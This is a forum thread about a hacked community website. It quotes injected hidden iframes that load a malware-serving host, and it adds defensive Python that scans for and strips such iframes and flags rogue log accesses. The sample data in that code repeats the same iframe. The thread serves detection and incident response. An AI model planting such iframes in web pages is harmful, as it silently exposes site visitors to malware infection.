Author Topic: Virus warning!  (Read 1799 times)

Offline juan_fine (Topic starter)

  • Newbie
  • *
  • Join Date: Jan 2007
  • Posts: 26
    • http://www.mousam-river.com/
Virus warning!
« on: September 05, 2009, 08:14:31 PM »
When I click on the Archive link at the bottom of the home page, Avast pops up a warning about it containing the "HTML:Iframe-inf" virus. It obviously could be a false positive, but...
 

Offline the_leander

  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3448
    • http://www.extropia.co.uk/theleander/
Re: Virus warning!
« Reply #1 on: September 05, 2009, 08:23:57 PM »
Confirmed here too - Avast throws a fit.

Whether or not it's a false positive would require someone with another brand of scanner.

Surprising though.
Blessed Be,
Alan Fisher - the_leander

 

Offline clint

  • Lifetime Member
  • Jr. Member
  • **
  • Join Date: Jun 2007
  • Posts: 81
Re: Virus warning!
« Reply #2 on: September 05, 2009, 08:53:36 PM »
Norton reports Trojan.Pidief.G
 

Offline AmiSake

  • Newbie
  • *
  • Join Date: Nov 2006
  • Posts: 41
Re: Virus warning!
« Reply #3 on: September 05, 2009, 09:07:14 PM »
When I click on the Archive link using firefox 3.5 and Kaspersky AV 7 nothing happens. So...
is it or isn't it a virus ??

Edit: did some more checking and also Kaspersky complains about this link so it is definitely wrong...
« Last Edit: September 05, 2009, 09:12:19 PM by AmiSake »
 

Offline nOw2

  • Full Member
  • ***
  • Join Date: Jul 2002
  • Posts: 194
Re: Virus warning!
« Reply #4 on: September 05, 2009, 09:09:06 PM »
Something nasty has happened to that page; confirm it with curl or wget but for the moment do not click on the Archive link.
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
Re: Virus warning!
« Reply #5 on: September 05, 2009, 09:22:32 PM »
I've downloaded the page with wget and it has the following HTML appended outside the closing HTML tag

Code:
<iframe src=http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
From google's safe browsing diagnostic

Quote
What is the current listing status for davtraff.com?

    Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

    Of the 284 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-05, and the last time suspicious content was found on this site was on 2009-09-05.

    Malicious software includes 405 trojan(s), 219 exploit(s), 1 scripting exploit(s).

    This site was hosted on 5 network(s) including AS18106 (VIEWQWEST), AS48974 (MFOREX), AS49314 (NEVAL).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, davtraff.com appeared to function as an intermediary for the infection of 213 site(s) including pcu.ac.kr/, sisa0582.com/, tryonpalace.org/.

This doesn't look like a false positive to me...
« Last Edit: September 05, 2009, 09:25:33 PM by Karlos »
int p; // A
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
Re: Virus warning!
« Reply #6 on: September 05, 2009, 09:32:53 PM »
Ok guys. I have confirmed that the iframe HTML was appended to the file somehow and have removed the iframe from the source file.

I've let Wayne know directly. I'll see if I can confirm whether or not any other pages have been touched.
 

Offline Karlos

  • Sockologist
  • Global Moderator
  • Hero Member
  • *****
  • Join Date: Nov 2002
  • Posts: 16867
  • Country: gb
  • Thanked: 4 times
Re: Virus warning!
« Reply #7 on: September 06, 2009, 12:02:56 AM »
Right folks, I've written a script that identifies and removes this infection from any file on the site. Luckily, it was only a few files, most of which were "dummy" index files used to hide directory contents.

The files that were affected were only modified yesterday.

Please check your malware tools again and let me know if you still see anything.
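Karlos's clean-up script is not posted in the thread. The following is an added example, written for this page and not his code, of how such a scanner can work for the symptom he described in replies #5 and #7: hidden zero-size iframes appended after the closing </html> tag of static files. The sample page is constructed (only the davtraff.com domain is taken from the quoted snippet), and the function and file names are this example's own.

```python
"""Locate and strip hidden iframes injected into static HTML files."""
import os
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample page, shaped like the injection quoted in the thread:
# two zero-size iframes appended after the closing </html> tag.  Only the
# domain comes from the thread; the page body is made up for this example.
SAMPLE_PAGE = (
    "<html><head><title>Archive</title></head>\n"
    "<body><p>Archive index.</p></body></html>\n"
    '<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 '
    'style="hidden" frameborder=0 scrolling=no></iframe>'
    '<iframe src="http://davtraff.com/lib/index.php" width=0 height=0 '
    'style="hidden" frameborder=0 scrolling=no></iframe>\n'
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
CLOSING_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)
HIDING_STYLE_RE = re.compile(r"hidden|display\s*:\s*none", re.IGNORECASE)


def attr_value(tag: str, name: str) -> str:
    """Value of one attribute in a tag; tolerates the unbalanced quoting seen
    in the quoted snippet (src=http://...").  Empty string if absent."""
    pattern = r"\b" + re.escape(name) + r"""\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))"""
    m = re.search(pattern, tag, re.IGNORECASE)
    if not m:
        return ""
    return next(g for g in m.groups() if g is not None)


def is_hidden_iframe(tag: str) -> bool:
    """A zero-sized or CSS-hidden iframe matches the injection pattern; a
    visible embed (say, a 300x200 video player) does not."""
    width = attr_value(tag, "width").lower().rstrip("px").strip()
    height = attr_value(tag, "height").lower().rstrip("px").strip()
    if width == "0" and height == "0":
        return True
    return bool(HIDING_STYLE_RE.search(attr_value(tag, "style")))


def trailing_content(html: str) -> str:
    """Everything after the last </html>; a clean page has only whitespace."""
    closes = list(CLOSING_HTML_RE.finditer(html))
    return html[closes[-1].end():] if closes else ""


def find_injected_iframes(html: str) -> List[Tuple[str, bool]]:
    """Return (tag, appended_after_close) for each hidden iframe found."""
    closes = list(CLOSING_HTML_RE.finditer(html))
    close_at = closes[-1].end() if closes else len(html)
    return [(m.group(0), m.start() >= close_at)
            for m in IFRAME_RE.finditer(html) if is_hidden_iframe(m.group(0))]


def clean_html(html: str) -> Tuple[str, int]:
    """Remove hidden iframes only; return (cleaned_html, number_removed)."""
    removed = 0

    def drop(m):
        nonlocal removed
        if is_hidden_iframe(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    cleaned = IFRAME_RE.sub(drop, html)
    # If the injection left only whitespace after </html>, normalise it to
    # a single newline so the file ends where the document does.
    closes = list(CLOSING_HTML_RE.finditer(cleaned))
    if removed and closes and cleaned[closes[-1].end():].strip() == "":
        cleaned = cleaned[:closes[-1].end()] + "\n"
    return cleaned, removed


def scan_tree(root: str, fix: bool = False) -> Dict[str, int]:
    """Walk a site root and report affected files; with fix=True rewrite them."""
    report: Dict[str, int] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                cleaned, removed = clean_html(fh.read())
            if removed:
                report[path] = removed
                if fix:
                    with open(path, "w", encoding="utf-8") as fh:
                        fh.write(cleaned)
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Usage: python scan_iframes.py /path/to/site [--fix]
        for path, n in scan_tree(sys.argv[1], fix="--fix" in sys.argv).items():
            print(f"{path}: {n} hidden iframe(s)")
    else:
        for tag, appended in find_injected_iframes(SAMPLE_PAGE):
            where = "after </html>" if appended else "inside document"
            print(where, tag[:60])
```

Run it without arguments to see it flag the two constructed iframes; run it with a site root to get a report, and add --fix only after reviewing that report, since a scanner like this rewrites files in place. Karlos's observation that the affected files had a fresh modification time is a useful second signal: comparing the report against files modified since the last known-good date catches anything the regex misses.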
 

Offline the_leander

  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3448
    • http://www.extropia.co.uk/theleander/
Re: Virus warning!
« Reply #8 on: September 06, 2009, 12:13:27 AM »
All clear here boss.
 

Offline Wayne

  • Winning!
  • Hero Member
  • *****
  • Join Date: Feb 2002
  • Posts: 3940
    • http://www.whyzzat.com
Re: Virus warning!
« Reply #9 on: September 08, 2009, 08:29:25 PM »
Sorry for not addressing this sooner as it was a holiday weekend and I had taken Friday off.

After reviewing the logs and accesses of the site, Karlos and I are fairly certain that someone gained access to upload a script which allowed them to either upload, or create hundreds of bogus .html files for drug sales through a remnant Xoops file (the comics feature).

That hole has now been closed and all site and FTP passwords are being changed.  If you want to go ahead and change your own password, that'd be cool too, but I can't change it for 6000 people manually.

As for the hack itself, it seems to have been fairly innocuous and hopefully should not have affected anyone -- especially if you have a virus scanner active.

While I would have -- as always -- appreciated this being discussed privately versus the mass panic caused by discussing it in a public thread, I do appreciate it being brought to my attention and hope it's now been handled.

We now have a couple of scripts in place to check for rogue accesses and have been checking every few hours without finding anything as of yet.

http://google.com/safebrowsing/diagnostic?site=amiga.org

Wayne
//* Signature Free *//
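Wayne mentions scripts that check the logs for rogue accesses. As an added example that is not the site's own tooling, here is a small triage pass over web server access logs in combined format. The thread only says the entry point was a leftover Xoops "comics" file, so the /modules/comics/ prefix (where a Xoops module would normally live) and the other paths, IPs and timestamps are assumptions constructed for this example; the rules to adapt are the three constants at the top.

```python
"""Flag rogue accesses in a web server access log (combined format)."""
import re
from collections import Counter
from typing import List, NamedTuple

# Combined log format as written by Apache and many other servers.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Assumptions for this example: the thread only says the entry point was a
# leftover Xoops "comics" file, so /modules/comics/ is a guess; the other
# paths are invented.  Adapt these three to the site being watched.
RETIRED_PREFIXES = ("/modules/comics/",)    # features that were removed
KNOWN_POST_PATHS = {"/forum/index.php"}     # endpoints expected to take POSTs
STATIC_DIRS = ("/images/", "/uploads/")     # should never execute scripts

# Constructed sample log lines (documentation IP ranges, invented times).
SAMPLE_LOG = """\
203.0.113.7 - - [04/Sep/2009:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Sep/2009:10:12:03 +0000] "GET /forum/index.php HTTP/1.1" 200 8220 "-" "Mozilla/5.0"
198.51.100.23 - - [04/Sep/2009:11:40:51 +0000] "GET /modules/comics/upload.php HTTP/1.1" 200 310 "-" "curl/7.19"
198.51.100.23 - - [04/Sep/2009:11:40:53 +0000] "POST /modules/comics/upload.php HTTP/1.1" 200 12 "-" "curl/7.19"
198.51.100.23 - - [04/Sep/2009:11:41:10 +0000] "POST /images/x.php HTTP/1.1" 200 2048 "-" "curl/7.19"
192.0.2.9 - - [04/Sep/2009:12:01:00 +0000] "POST /forum/index.php?action=post2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
this line is not a log record
"""


class Finding(NamedTuple):
    ip: str
    method: str
    path: str
    reason: str


def classify(method: str, path: str) -> str:
    """Return a reason string if the request looks rogue, else ''."""
    bare = path.split("?", 1)[0]            # compare without the query string
    if bare.startswith(RETIRED_PREFIXES):
        return "request to retired feature"
    if bare.endswith(".php") and bare.startswith(STATIC_DIRS):
        return "script executed from static directory"
    if method == "POST" and bare not in KNOWN_POST_PATHS:
        return "POST to unexpected endpoint"
    return ""


def rogue_accesses(lines: List[str]) -> List[Finding]:
    """Parse each line and keep the ones a rule objects to."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                           # skip blank or malformed lines
            continue
        reason = classify(m["method"], m["path"])
        if reason:
            findings.append(Finding(m["ip"], m["method"], m["path"], reason))
    return findings


def by_ip(findings: List[Finding]) -> Counter:
    """Count findings per client address; one noisy address stands out."""
    return Counter(f.ip for f in findings)


if __name__ == "__main__":
    hits = rogue_accesses(SAMPLE_LOG.splitlines())
    for f in hits:
        print(f"{f.ip:15} {f.method:4} {f.path:35} {f.reason}")
    print("per IP:", dict(by_ip(hits)))
```

The point of the "retired feature" rule is the one Wayne's post makes: a module that is no longer used should produce no traffic at all, so any hit on it is worth a look even when the response is 200. A run from cron every few hours, as he describes, only needs a `rogue_accesses(open(logfile))` call and a mail when the list is non-empty.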